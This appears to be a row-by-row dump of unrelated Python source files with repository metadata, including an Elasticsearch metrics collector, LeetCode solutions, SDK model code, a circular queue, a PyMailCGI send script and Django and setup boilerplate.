return arrow.get(self.report_ts - self.collect_interval).datetime, arrow.get(self.report_ts).datetime
def get_biz_name(self, bk_biz_id):
"""
        Get the business name for a given business ID.
"""
return self.biz_info[int(bk_biz_id)]["bk_biz_name"] if int(bk_biz_id) in self.biz_info else bk_biz_id
def collect(self, namespaces=None, response_format="prometheus"):
"""
        Collection entry point.
"""
metric_methods = self.list_metric_methods(namespaces)
metric_groups = []
for metric_method in metric_methods:
try:
begin_time = time.time()
metric_groups.append(
{
"namespace": metric_method.namespace,
"description": metric_method.description,
"metrics": metric_method(),
}
)
logger.info(
"[statistics_data] collect metric->[{}] took {} ms".format(
metric_method.namespace, int((time.time() - begin_time) * 1000)
),
)
except Exception as e: # pylint: disable=broad-except
logger.exception("[statistics_data] collect metric->[{}] failed: {}".format(metric_method.namespace, e))
if response_format != "prometheus":
return metric_groups
metric_text_list = []
        # Convert to Prometheus exposition format
for group in metric_groups:
metric_text_list.append("# {}".format(group["description"] or group["namespace"]))
for metric in group["metrics"]:
metric_text_list.append(
metric.to_prometheus_text(namespace=group["namespace"], timestamp=self.report_ts)
)
return "\n".join(metric_text_list)
@property
def registered_metrics(self):
return [
method
for method in dir(self)
if method != "registered_metrics"
and callable(getattr(self, method))
and getattr(getattr(self, method), "is_metric", None)
]
def list_metric_methods(self, namespaces=None):
"""
        Get the metric methods matching the given namespaces.
:param namespaces:
:return:
"""
namespaces = namespaces or []
if isinstance(namespaces, str):
namespaces = [namespaces]
methods = []
for metric in self.registered_metrics:
method = getattr(self, metric)
if not namespaces:
methods.append(method)
for namespace in namespaces:
if method.namespace.startswith(namespace):
methods.append(method)
return methods
@classmethod
def append_total_metric(cls, metrics):
total = sum(metric.metric_value for metric in metrics)
metrics.append(
Metric(
metric_name="total",
metric_value=total,
)
)
return metrics
class MetricCollector(BaseMetricCollector):
def __init__(self, *args, **kwargs):
super(MetricCollector, self).__init__(*args, **kwargs)
self.cluster_infos = {
cluster_info["cluster_config"]["cluster_id"]: cluster_info for cluster_info in self.list_cluster_info()
}
self._cluster_clients = {}
@staticmethod
def list_cluster_info(cluster_id=None):
"""
        Get the list of storage clusters.
"""
params = {"cluster_type": STORAGE_CLUSTER_TYPE, "no_request": True}
if cluster_id:
params.update({"cluster_id": cluster_id})
return TransferApi.get_cluster_info(params)
def get_es_client_by_id(self, cluster_id):
"""
        Get an ES client by cluster ID.
"""
cluster_info = self.cluster_infos.get(cluster_id)
if not cluster_info:
return None
return self.get_es_client(cluster_info)
def get_es_client(self, cluster_info):
"""
        Get an ES client from cluster info.
"""
cluster_id = cluster_info["cluster_config"]["cluster_id"]
if cluster_id in self._cluster_clients:
return self._cluster_clients[cluster_id]
self._cluster_clients[cluster_id] = None
cluster_config = cluster_info["cluster_config"]
domain_name = cluster_config["domain_name"]
port = cluster_config["port"]
auth_info = cluster_info.get("auth_info", {})
username = auth_info.get("username")
password = auth_info.get("password")
cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
es_address: tuple = (str(domain_name), int(port))
cs.settimeout(2)
status: int = cs.connect_ex(es_address)
if status != 0:
raise EsConnectFailException()
cs.close()
http_auth = (username, password) if username and password else None
es_client = Elasticsearch(
hosts=[domain_name],
http_auth=http_auth,
scheme="http",
port=port,
verify_certs=True,
timeout=10,
)
if not es_client.ping(params={"request_timeout": 10}):
raise EsConnectFailException()
self._cluster_clients[cluster_id] = es_client
return es_client
@register_metric("business_active", _("活跃业务"))
def business_active(self):
        # Only businesses that have searched logs within the last week count as active
history_ids = UserIndexSetSearchHistory.objects.filter(
created_at__gte=arrow.now().replace(days=-7).datetime
).values_list("index_set_id", flat=True)
project_ids = set(
LogIndexSet.objects.filter(index_set_id__in=set(history_ids)).values_list("project_id", flat=True)
)
metrics = [
Metric(
metric_name="count",
metric_value=1,
dimensions={
"target_biz_id": self.project_biz_info[project_id]["bk_biz_id"],
"target_biz_name": self.project_biz_info[project_id]["bk_biz_name"],
},
)
for project_id in project_ids
if self.project_biz_info.get(project_id)
]
metrics = self.append_total_metric(metrics)
return metrics
@register_metric("user_active", _("活跃用户"))
def user_active(self):
user_model = get_user_model()
recent_login_users = user_model.objects.filter(last_login__gte=self.time_range[0])
metrics = [
Metric(metric_name="count", metric_value=1, dimensions={"username": user.username})
for user in recent_login_users
]
metrics = self.append_total_metric(metrics)
return metrics
@register_metric("collector_config", _("采集配置"))
def collector_config(self):
groups = (
CollectorConfig.objects.filter(is_active=True)
.values("bk_biz_id")
.order_by()
.annotate(count=Count("collector_config_id"))
)
metrics = [
Metric(
metric_name="count",
metric_value=group["count"],
dimensions={
"target_biz_id": group["bk_biz_id"],
"target_biz_name": self.get_biz_name(group["bk_biz_id"]),
},
)
for group in groups
]
metrics = self.append_total_metric(metrics)
return metrics
@register_metric("collector_host", _("采集主机"), cache_time=60 * 60)
def collect_host(self):
configs = CollectorConfig.objects.filter(is_active=True).values(
"bk_biz_id", "subscription_id", "category_id", "collector_config_id"
)
biz_mapping = {
config["subscription_id"]: {
"bk_biz_id": config["bk_biz_id"],
"category_id": config["category_id"],
"collector_config_id": config["collector_config_id"],
}
for config in configs
if config["subscription_id"]
}
groups = NodeApi.get_subscription_instance_status(
{"subscription_id_list": list(biz_mapping.keys()), "no_request": True}
)
metrics = [
Metric(
metric_name="count",
metric_value=len(group["instances"]),
dimensions={
"target_biz_id": biz_mapping[group["subscription_id"]]["bk_biz_id"],
"target_biz_name": self.get_biz_name(biz_mapping[group["subscription_id"]]["bk_biz_id"]),
"category_id": biz_mapping[group["subscription_id"]]["category_id"],
"collector_config_id": biz_mapping[group["subscription_id"]]["collector_config_id"],
},
)
for group in groups
]
metrics = self.append_total_metric(metrics)
return metrics
@register_metric("index_set", _("索引集"))
def index_set(self):
groups = (
LogIndexSet.objects.values("project_id", "scenario_id").order_by().annotate(count=Count("index_set_id"))
)
metrics = [
Metric(
metric_name="count",
metric_value=group["count"],
dimensions={
"target_biz_id": self.project_biz_info[group["project_id"]]["bk_biz_id"],
"target_biz_name": self.project_biz_info[group["project_id"]]["bk_biz_name"],
"scenario_id": group["scenario_id"],
},
)
for group in groups
if self.project_biz_info.get(group["project_id"])
]
metrics = self.append_total_metric(metrics)
return metrics
@register_metric("third_party_es", _("第三方ES"))
def third_party_es(self):
clusters = TransferApi.get_cluster_info({"cluster_type": STORAGE_CLUSTER_TYPE, "no_request": True})
groups = defaultdict(int)
for cluster in clusters:
if cluster["cluster_config"]["registered_system"] == "_default":
continue
bk_biz_id = cluster["cluster_config"]["custom_option"]["bk_biz_id"]
if not bk_biz_id:
continue
groups[bk_biz_id] += 1
metrics = [
Metric(
metric_name="count",
metric_value=count,
dimensions={"target_biz_id": bk_biz_id, "target_biz_name": self.get_biz_name(bk_biz_id)},
)
for bk_biz_id, count in groups.items()
]
metrics = self.append_total_metric(metrics)
return metrics
@register_metric("cluster_health", _("集群健康度"))
def cluster_health(self):
metrics = []
for cluster_info in self.cluster_infos.values():
try:
es_client = self.get_es_client(cluster_info)
if not es_client:
continue
health_data = es_client.cluster.health(params={"request_timeout": 10})
dimensions = {
"origin_cluster_name": health_data["cluster_name"],
"cluster_id": cluster_info.get("cluster_config").get("cluster_id"),
"cluster_name": cluster_info.get("cluster_config").get("cluster_name"),
}
for key in [
"number_of_nodes",
"number_of_data_nodes",
"active_primary_shards",
"active_shards",
"relocating_shards",
"initializing_shards",
"unassigned_shards",
"delayed_unassigned_shards",
"number_of_pending_tasks",
"number_of_in_flight_fetch",
"task_max_waiting_in_queue_millis",
"active_shards_percent_as_number",
]:
if key not in health_data:
continue
metrics.append(
Metric(
metric_name=key,
metric_value=health_data[key],
dimensions=dimensions,
)
)
                # The status field needs to be handled separately
status_mapping = {
"green": 0,
"yellow": 1,
"red": 2,
}
metrics.append(
Metric(
metric_name="status",
metric_value=status_mapping[health_data["status"]],
dimensions=dimensions,
)
)
except Exception as e: # pylint: disable=broad-except
logger.exception("fail to collect cluster_health metric for cluster->{}, {}".format(cluster_info, e))
return metrics
@register_metric("cluster_node", _("集群节点"))
def cluster_node(self):
metrics = []
for cluster_info in self.cluster_infos.values():
try:
es_client = self.get_es_client(cluster_info)
if not es_client:
continue
allocations = es_client.cat.allocation(format="json", bytes="mb", params={"request_timeout": 10})
for allocation in allocations:
if allocation["node"] == "UNASSIGNED":
                        # Skip unassigned nodes
continue
dimensions = {
"node_ip": allocation["ip"],
"node": allocation["node"],
"cluster_id": cluster_info.get("cluster_config").get("cluster_id"),
"cluster_name": cluster_info.get("cluster_config").get("cluster_name"),
}
for key in ["shards", "disk.indices", "disk.used", "disk.avail", "disk.total", "disk.percent"]:
if key not in allocation:
continue
metrics.append(
Metric(
metric_name=key.replace(".", "_"),
metric_value=allocation[key],
dimensions=dimensions,
)
)
nodes = es_client.cat.nodes(format="json", params={"request_timeout": 10})
for node in nodes:
dimensions = {
"node_ip": node["ip"],
"node": node["name"],
"cluster_id": cluster_info.get("cluster_config").get("cluster_id"),
"cluster_name": cluster_info.get("cluster_config").get("cluster_name"),
}
for key in ["heap.percent", "ram.percent", "cpu", "load_1m", "load_5m", "load_15m"]:
if key not in node:
continue
metrics.append(
Metric(
metric_name=key.replace(".", "_"),
metric_value=node[key],
dimensions=dimensions,
)
)
except Exception as e: # pylint: disable=broad-except
logger.exception("fail to collect cluster_node metric for cluster->{}, {}".format(cluster_info, e))
return metrics
@register_metric("grafana_dashboard", _("Grafana 仪表盘"), cache_time=60 * 60)
def grafana_dashboard(self):
metrics = []
all_organization = grafana_client.get_all_organization().json()
for org in all_organization:
org_name = org["name"]
if not org_name.isdigit():
continue
if int(org_name) not in self.biz_info:
continue
dashboards = grafana_client.search_dashboard(org_id=org["id"]).json()
metrics.append(
Metric(
metric_name="count",
metric_value=len(dashboards),
dimensions={"target_biz_id": int(org_name), "target_biz_name": self.get_biz_name(org_name)},
)
)
panel_count = 0
for dashboard in dashboards:
dashboard_info = (
grafana_client.get_dashboard_by_uid(org_id=org["id"], dashboard_uid=dashboard["uid"])
.json()
.get("dashboard", {})
)
for panel in dashboard_info.get("panels", []):
if panel["type"] == "row":
                        # Row panels nest other panels, so count the nested ones
panel_count += len(panel.get("panels", []))
else:
panel_count += 1
metrics.append(
Metric(
metric_name="panel_count",
metric_value=panel_count,
dimensions={"target_biz_id": int(org_name), "target_biz_name": self.get_biz_name(org_name)},
)
)
return metrics
@register_metric("log_extract_strategy", _("日志提取策略"))
def log_extract_strategy(self):
from apps.log_extract.models import Strategies
groups = Strategies.objects.all().values("bk_biz_id").order_by().annotate(count=Count("strategy_id"))
metrics = [
Metric(
metric_name="count",
metric_value=group["count"],
dimensions={
"target_biz_id": group["bk_biz_id"],
"target_biz_name": self.get_biz_name(group["bk_biz_id"]),
},
)
for group in groups
]
metrics = self.append_total_metric(metrics)
return metrics
@register_metric("log_extract_task", _("日志提取任务"))
def log_extract_task(self):
from apps.log_extract.models import Tasks
groups = Tasks.objects.all().values("bk_biz_id", "created_by").order_by().annotate(count=Count("task_id"))
        # Number of tasks per business
biz_count_groups = defaultdict(int)
        # Number of users per business
user_count_groups = defaultdict(int)
for group in groups:
biz_count_groups[group["bk_biz_id"]] += group["count"]
user_count_groups[group["bk_biz_id"]] += 1
metrics = [
Metric(
metric_name="count",
metric_value=count,
dimensions={"target_biz_id": bk_biz_id, "target_biz_name": self.get_biz_name(bk_biz_id)},
)
for bk_biz_id, count in biz_count_groups.items()
]
metrics = self.append_total_metric(metrics)
metrics += [
Metric(
metric_name="user_count",
metric_value=count,
dimensions={"target_biz_id": bk_biz_id, "target_biz_name": self.get_biz_name(bk_biz_id)},
)
for bk_biz_id, count in user_count_groups.items()
]
return metrics
| [
"[email protected]"
] | |
025de780542a4de0d528fb37ec990d44996cca19 | fa571a842f04bcbc77ff203a5ed6f6ee776eed6d | /keywords/codes/defkeyword.py | ee484d5db4128adb54ec86a4adb8116bafe3b444 | [] | no_license | krishna-rawat-hp/PythonProgramming | b25c0916475724e6d2de4b7d59cf40b5b5e8330b | d24df17ca6aff9271c44ef8c73b80c00cd065ded | refs/heads/master | 2023-03-11T19:24:34.529059 | 2021-02-27T14:09:22 | 2021-02-27T14:09:22 | 282,611,873 | 0 | 0 | null | 2020-07-26T10:38:54 | 2020-07-26T08:52:49 | null | UTF-8 | Python | false | false | 93 | py | def my_func(a,b): # def is used to define a function
c = a+b
print(c)
my_func(15,35)
| [
"[email protected]"
] | |
7cf821bf15a32a637688390b90127482667b71d9 | fe6eaa2f3656dedcb2c1e937cc1363d19a0d3ec1 | /leetcode_python/231.power-of-two.py | 6c402eec05c33366e999760635c0f1d508c79f71 | [] | no_license | toyijiu/my_code | 4619ac6bc06c5032e01d5c215dbae516bbc4fe77 | dd163cc47e2c706504aba1d42322167fb93dd9e9 | refs/heads/master | 2020-08-31T14:49:18.188393 | 2019-11-27T08:57:55 | 2019-11-27T08:57:55 | 218,714,791 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 883 | py | #
# @lc app=leetcode id=231 lang=python3
#
# [231] Power of Two
#
# https://leetcode.com/problems/power-of-two/description/
#
# algorithms
# Easy (41.63%)
# Total Accepted: 213.5K
# Total Submissions: 512.8K
# Testcase Example: '1'
#
# Given an integer, write a function to determine if it is a power of two.
#
# Example 1:
#
#
# Input: 1
# Output: true
# Explanation: 2^0 = 1
#
#
# Example 2:
#
#
# Input: 16
# Output: true
# Explanation: 2^4 = 16
#
# Example 3:
#
#
# Input: 218
# Output: false
#
#
class Solution:
def isPowerOfTwo(self, n: int) -> bool:
        # The usual approach is to repeatedly check divisibility by 2 and divide by 2,
        # but in fact it is enough that only the highest set bit is 1 and all lower bits are 0
if n < 1:
return False
while n > 1:
if n % 2:
return False
n /= 2
return n == 1
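# Sketch of an alternative (not part of the original submission): the single-set-bit
# property noted above can be checked directly with a bitwise trick instead of the
# division loop.
def is_power_of_two_bit_trick(n: int) -> bool:
    # A power of two has exactly one bit set, so n & (n - 1) clears that bit to zero.
    return n > 0 and n & (n - 1) == 0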
| [
"[email protected]"
] | |
7d31cb5286fe189f97049fbbe823e25ef89ce2d5 | 7a596dc0e121054fe5f05fae6c78774a57cf94ac | /setup.py | c6a683babc0762c4c1be30bfcd7d184061c327bb | [
"MIT"
] | permissive | nhoffman/swarmwrapper | 8fffae5ed5824313f054fd7edb1ed2d3897b9c02 | b62f955f843c76c4696320e2b2a14ce2b80e1807 | refs/heads/master | 2021-01-17T07:20:15.826516 | 2018-03-14T18:21:32 | 2018-03-14T18:21:32 | 42,473,732 | 3 | 1 | null | 2016-06-07T18:33:22 | 2015-09-14T20:00:11 | Python | UTF-8 | Python | false | false | 1,038 | py | import os
import subprocess
from setuptools import setup, find_packages
subprocess.call(
('mkdir -p swarmwrapper/data && '
'git describe --tags --dirty > swarmwrapper/data/ver.tmp'
'&& mv swarmwrapper/data/ver.tmp swarmwrapper/data/ver '
'|| rm -f swarmwrapper/data/ver.tmp'),
shell=True, stderr=open(os.devnull, "w"))
from swarmwrapper.swarmwrapper import __version__
setup(
author='Noah Hoffman',
author_email='[email protected]',
description='wrapper for using swarm with pplacer',
url='https://github.com/nhoffman/swarmwrapper',
name='swarmwrapper',
packages=find_packages(),
package_dir={'swarmwrapper': 'swarmwrapper'},
package_data={'swarmwrapper': ['data/ver']},
entry_points={'console_scripts': ['swarmwrapper = swarmwrapper.swarmwrapper:main']},
version=__version__,
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Console',
'Operating System :: POSIX',
'Programming Language :: Python :: 2.7',
],
)
| [
"[email protected]"
] | |
f6b85844ae241476a94fc75c33793cf360b02aa6 | 9b64f0f04707a3a18968fd8f8a3ace718cd597bc | /huaweicloud-sdk-drs/huaweicloudsdkdrs/v3/model/batch_set_objects_response.py | 1e18f86df848790e44e33d3a24e185439a9fa96c | [
"Apache-2.0"
] | permissive | jaminGH/huaweicloud-sdk-python-v3 | eeecb3fb0f3396a475995df36d17095038615fba | 83ee0e4543c6b74eb0898079c3d8dd1c52c3e16b | refs/heads/master | 2023-06-18T11:49:13.958677 | 2021-07-16T07:57:47 | 2021-07-16T07:57:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,672 | py | # coding: utf-8
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
class BatchSetObjectsResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'all_counts': 'int',
'results': 'list[DatabaseObjectResp]'
}
attribute_map = {
'all_counts': 'all_counts',
'results': 'results'
}
def __init__(self, all_counts=None, results=None):
"""BatchSetObjectsResponse - a model defined in huaweicloud sdk"""
super(BatchSetObjectsResponse, self).__init__()
self._all_counts = None
self._results = None
self.discriminator = None
if all_counts is not None:
self.all_counts = all_counts
if results is not None:
self.results = results
@property
def all_counts(self):
"""Gets the all_counts of this BatchSetObjectsResponse.
        Total count
:return: The all_counts of this BatchSetObjectsResponse.
:rtype: int
"""
return self._all_counts
@all_counts.setter
def all_counts(self, all_counts):
"""Sets the all_counts of this BatchSetObjectsResponse.
        Total count
:param all_counts: The all_counts of this BatchSetObjectsResponse.
:type: int
"""
self._all_counts = all_counts
@property
def results(self):
"""Gets the results of this BatchSetObjectsResponse.
        List of batch object selection results
:return: The results of this BatchSetObjectsResponse.
:rtype: list[DatabaseObjectResp]
"""
return self._results
@results.setter
def results(self, results):
"""Sets the results of this BatchSetObjectsResponse.
        List of batch object selection results
:param results: The results of this BatchSetObjectsResponse.
:type: list[DatabaseObjectResp]
"""
self._results = results
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
import simplejson as json
return json.dumps(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, BatchSetObjectsResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
] | |
556cc3314b023aaab5a462d23db49fc1d46593c8 | bfe6c95fa8a2aae3c3998bd59555583fed72900a | /MyCircularQueue.py | cc36333e54e793ae307e426135a9c5b28f28d8dd | [] | no_license | zzz136454872/leetcode | f9534016388a1ba010599f4771c08a55748694b2 | b5ea6c21bff317884bdb3d7e873aa159b8c30215 | refs/heads/master | 2023-09-01T17:26:57.624117 | 2023-08-29T03:18:56 | 2023-08-29T03:18:56 | 240,464,565 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,165 | py | class Node:
def __init__(self, val):
self.val = val
self.next = None
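# Design note: the queue below is backed by a fixed ring of pre-allocated linked-list
# nodes; the front and rear pointers walk the ring and self.c tracks how many slots
# are in use, so no nodes are created or freed after construction.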
class MyCircularQueue:
def __init__(self, k: int):
self.size = k
self.front = Node(-1)
p = self.front
for i in range(k):
p.next = Node(-1)
p = p.next
p.next = self.front
self.rear = p
self.c = 0
def enQueue(self, value: int) -> bool:
if self.c == self.size:
return False
self.c += 1
self.rear = self.rear.next
self.rear.val = value
return True
def deQueue(self) -> bool:
if self.c == 0:
return False
self.c -= 1
self.front = self.front.next
return True
def Front(self) -> int:
if self.c == 0:
return -1
return self.front.val
def Rear(self) -> int:
if self.c == 0:
return -1
return self.rear.val
def isEmpty(self) -> bool:
return self.c == 0
def isFull(self) -> bool:
return self.c == self.size
m = MyCircularQueue(3)
m.enQueue(1)
m.enQueue(2)
m.enQueue(3)
m.enQueue(4)
print(m.Rear())
| [
"[email protected]"
] | |
0d9157411e4013eb8d23e1592693f64f4d2340c9 | 282e6905cbcdc7795f5bd145f5310d4eef4d199d | /Dog Walking/Python-Solution.py | a3e0fd05d8058ce6172de8cfe0c2f836dd633d76 | [] | no_license | Lizonghang/IEEEX | d9e41d7ba00dc73706afe4ae8aca9dae2d10ee37 | 8e5998820f9e0ba600e1b3f0366981f30e391ae1 | refs/heads/master | 2021-07-15T00:37:39.099411 | 2017-10-17T09:42:24 | 2017-10-17T09:42:24 | 105,604,511 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 301 | py | # Enter your code here. Read input from STDIN. Print output to STDOUT
T = input()
for t in xrange(T):
N, K = map(int, raw_input().strip().split())
w = []
for i in xrange(N):
w.append(int(input()))
w.sort()
d = []
for i in xrange(1, N):
d.append(w[i] - w[i - 1])
d.sort()
print sum(d[:N-K]) | [
"[email protected]"
] | |
862c4269fd260804df4f1319bae80e4d6604e0b0 | d48ddc1e4c4b1e379ed1c1971c84aa3c104edff2 | /pymachinetalk/application/constants.py | 1ab9e927720c09d627c62449d2566163a69b1225 | [
"MIT"
] | permissive | machinekit/pymachinetalk | 1b66e472f364c2d3fe6206823d6a50e41effce9e | be4bffd011ea76039407f043553552b8a0b69f2d | refs/heads/master | 2021-01-12T19:19:52.051968 | 2020-09-22T19:40:52 | 2020-09-22T19:40:52 | 44,979,021 | 6 | 7 | MIT | 2020-09-22T19:40:54 | 2015-10-26T15:47:57 | Python | UTF-8 | Python | false | false | 1,505 | py | # coding=utf-8
# protobuf
import machinetalk.protobuf.types_pb2 as types
import machinetalk.protobuf.motcmds_pb2 as motcmds
# noinspection PyUnresolvedReferences
from machinetalk.protobuf.status_pb2 import *
ORIGIN_G54 = types.ORIGIN_G54
ORIGIN_G55 = types.ORIGIN_G55
ORIGIN_G56 = types.ORIGIN_G56
ORIGIN_G57 = types.ORIGIN_G57
ORIGIN_G58 = types.ORIGIN_G58
ORIGIN_G59 = types.ORIGIN_G59
ORIGIN_G59_1 = types.ORIGIN_G59_1
ORIGIN_G59_2 = types.ORIGIN_G59_2
ORIGIN_G59_3 = types.ORIGIN_G59_3
MOTION_UNINITIALIZED = types.UNINITIALIZED_STATUS
MOTION_DONE = types.RCS_DONE
MOTION_EXEC = types.RCS_EXEC
MOTION_ERROR = types.RCS_ERROR
MOTION_RECEIVED = types.RCS_RECEIVED
MOTION_TYPE_NONE = motcmds._EMC_MOTION_TYPE_NONE
MOTION_TYPE_TRAVERSE = motcmds._EMC_MOTION_TYPE_TRAVERSE
MOTION_TYPE_FEED = motcmds._EMC_MOTION_TYPE_FEED
MOTION_TYPE_ARC = motcmds._EMC_MOTION_TYPE_ARC
MOTION_TYPE_TOOLCHANGEE = motcmds._EMC_MOTION_TYPE_TOOLCHANGE
MOTION_TYPE_PROBING = motcmds._EMC_MOTION_TYPE_PROBING
MOTION_TYPE_INDEXROTARY = motcmds._EMC_MOTION_TYPE_INDEXROTARY
RELEASE_BRAKE = 0
ENGAGE_BRAKE = 1
JOG_STOP = 0
JOG_CONTINUOUS = 1
JOG_INCREMENT = 2
SPINDLE_FORWARD = 0
SPINDLE_REVERSE = 1
SPINDLE_OFF = 2
SPINDLE_DECREASE = 3
SPINDLE_INCREASE = 4
SPINDLE_CONSTANT = 5
NML_ERROR = types.MT_EMC_NML_ERROR
NML_TEXT = types.MT_EMC_NML_TEXT
NML_DISPLAY = types.MT_EMC_NML_DISPLAY
OPERATOR_ERROR = types.MT_EMC_OPERATOR_ERROR
OPERATOR_TEXT = types.MT_EMC_OPERATOR_TEXT
OPERATOR_DISPLAY = types.MT_EMC_OPERATOR_DISPLAY
| [
"[email protected]"
] | |
bced46d25207d88a5d9ef827366a418030296c94 | 4e62fcb385d9e8a6af0c6c9ec315f803d6ea190b | /testsuite/modulegraph-dir/trivial-script | f52375825ebb81241b0cf11123498021f581e29b | [
"MIT"
] | permissive | ronaldoussoren/modulegraph2 | 8d8a18b472574acc158c5c293ae4ed7b88f06ba9 | 227954f5037e291edc91e666f21bda44fd66fcb2 | refs/heads/master | 2023-09-01T05:16:44.873049 | 2023-04-09T10:28:19 | 2023-04-09T10:28:19 | 231,953,118 | 12 | 7 | MIT | 2023-04-09T10:29:06 | 2020-01-05T17:36:35 | C | UTF-8 | Python | false | false | 98 | #!/usr/bin/env python3
print("What is your name?")
name = input()
print("Hello {}".format(name))
| [
"[email protected]"
] | ||
ca7dc3b58354ec5f7b8177aa40ae4f2f1c8c1694 | 242086b8c6a39cbc7af3bd7f2fd9b78a66567024 | /python/PP4E-Examples-1.4/Examples/PP4E/Internet/Web/dev/PyMailCGI_2.1/cgi-bin/onEditPageSend.py | aaeda84076959bbddb4003c8c1a90814ed51323b | [] | no_license | chuzui/algorithm | 7537d0aa051ac4cbe9f6a7ca9a3037204803a650 | c3006b24c4896c1242d3ceab43ace995c94f10c8 | refs/heads/master | 2021-01-10T13:05:30.902020 | 2015-09-27T14:39:02 | 2015-09-27T14:39:02 | 8,404,397 | 4 | 4 | null | null | null | null | UTF-8 | Python | false | false | 2,772 | py | #!/usr/bin/python
###############################################################
# On submit in edit window--finish a write, reply, or forward;
# in 2.0, we reuse the send tools in mailtools to construct
# and send the message, instead of older manual string scheme;
# we also now inherit attachment composition from that module;
###############################################################
import cgi, sys, commonhtml, os
from externs import mailtools
def saveAttachments(form, maxattach=3, savedir='partsupload'):
"""
save uploaded attach files in local files on
server from which mailtools will add to mail
"""
partnames = []
for i in range(1, maxattach+1):
fieldname = 'attach%d' % i
if form.has_key(fieldname) and form[fieldname].filename:
fileinfo = form[fieldname] # sent and filled?
filedata = fileinfo.value # read into string
filename = fileinfo.filename # client's path name
if '\\' in filename:
basename = filename.split('\\')[-1] # try dos clients
elif '/' in filename:
basename = filename.split('/')[-1] # try unix clients
else:
basename = filename # assume dir stripped
pathname = os.path.join(savedir, basename)
open(pathname, 'wb').write(filedata)
os.chmod(pathname, 0666) # need for some srvrs
partnames.append(pathname) # list of local paths
return partnames # gets type from name
#commonhtml.dumpstatepage(0)
form = cgi.FieldStorage() # parse form input data
attaches = saveAttachments(form) # cgi.print_form(form) to see
# server name from module or get-style url
smtpservername = commonhtml.getstandardsmtpfields(form)
# parms assumed to be in form or url here
from commonhtml import getfield # fetch value attributes
From = getfield(form, 'From') # empty fields may not be sent
To = getfield(form, 'To')
Cc = getfield(form, 'Cc')
Subj = getfield(form, 'Subject')
text = getfield(form, 'text')
if Cc == '?': Cc = ''
# tools reused from PyMailGUI
Tos = [addr.strip() for addr in To.split(';')] # multiple recip lists
Ccs = (Cc and [addr.strip() for addr in Cc.split(';')]) or ''
extraHdrs = [('Cc', Ccs), ('X-Mailer', 'PyMailCGI2')]
sender = mailtools.SilentMailSender(smtpservername)
try:
sender.sendMessage(From, Tos, Subj, extraHdrs, text, attaches)
except:
commonhtml.errorpage('Send mail error')
else:
commonhtml.confirmationpage('Send mail')
| [
"zui"
] | zui |
ae9e86029763d737b183b2caf5231f0d4f50921d | 11211916f39b9d98027b64d778e52743d0c519a1 | /L3/doc/assignments/download/code/tmp/mindmap.py | 79dfe6970ede18578894c3180bb23a782b56c190 | [] | no_license | mantasruigys3000/Group-Task | 87baf1bc2747323c0508f6f32ef733c3f4b50978 | 6790d74ae7fa0fe6b13733efcd75a9f4aca70ab0 | refs/heads/master | 2020-04-23T20:54:09.696659 | 2019-02-22T01:29:53 | 2019-02-22T01:29:53 | 171,454,102 | 0 | 0 | null | 2019-02-19T10:31:09 | 2019-02-19T10:31:08 | null | UTF-8 | Python | false | false | 113 | py | Ipsum sed tempora magnam quisquam porro tempora.
Username: Sid
Password: bungle
Quiquia modi sit dolore quiquia.
| [
"[email protected]"
] | |
cf48693e97cb38f9ccb91a41e55b51a294037776 | 7cf119239091001cbe687f73018dc6a58b5b1333 | /datashufflepy-zeus/src/branch_scripts2/NEWS/ZX_CJXW_ZYCJ/ZX_CJXW_ZYCJ_BQW_YW.py | ba8ecd5014776a7fa8dbfac0a2059a57780b2dab | [
"Apache-2.0"
] | permissive | ILKKAI/dataETL | 0f5b80c3482994f735f092a1e01fa1009bac4109 | 32f7ec3aaaf32b5074536a615cb9cd5c28bd499c | refs/heads/master | 2022-04-04T19:27:05.747852 | 2020-02-28T11:17:48 | 2020-02-28T11:17:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 356 | py | # -*- coding: utf-8 -*-
from database._mongodb import MongoClient
def data_shuffle(data):
return data
if __name__ == '__main__':
main_mongo = MongoClient(entity_code="ZX_CJXW_ZYCJ_BQW_YW", mongo_collection="ZX_CJXW_ZYCJ")
data_list = main_mongo.main()
for data in data_list:
re_data = data_shuffle(data)
print(re_data)
| [
"[email protected]"
] | |
92f76a6b89288b8b5be0af93b98b5c77b5bd1dad | b88ec36f31099bad6e6e647d2ea58c9ae9431368 | /manage.py | 3303836579406baa22be1d625ba3c1c0b62c1594 | [] | no_license | crowdbotics-apps/golfworld2020-21545 | 6365f3d3c057b0f664c57bf1e4ddc511429b02e8 | c4b0cfc85e1488792de4274c25c6f86b10558d73 | refs/heads/master | 2023-01-03T08:59:19.955215 | 2020-10-15T20:32:40 | 2020-10-15T20:32:40 | 304,441,435 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 639 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'golfworld2020_21545.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
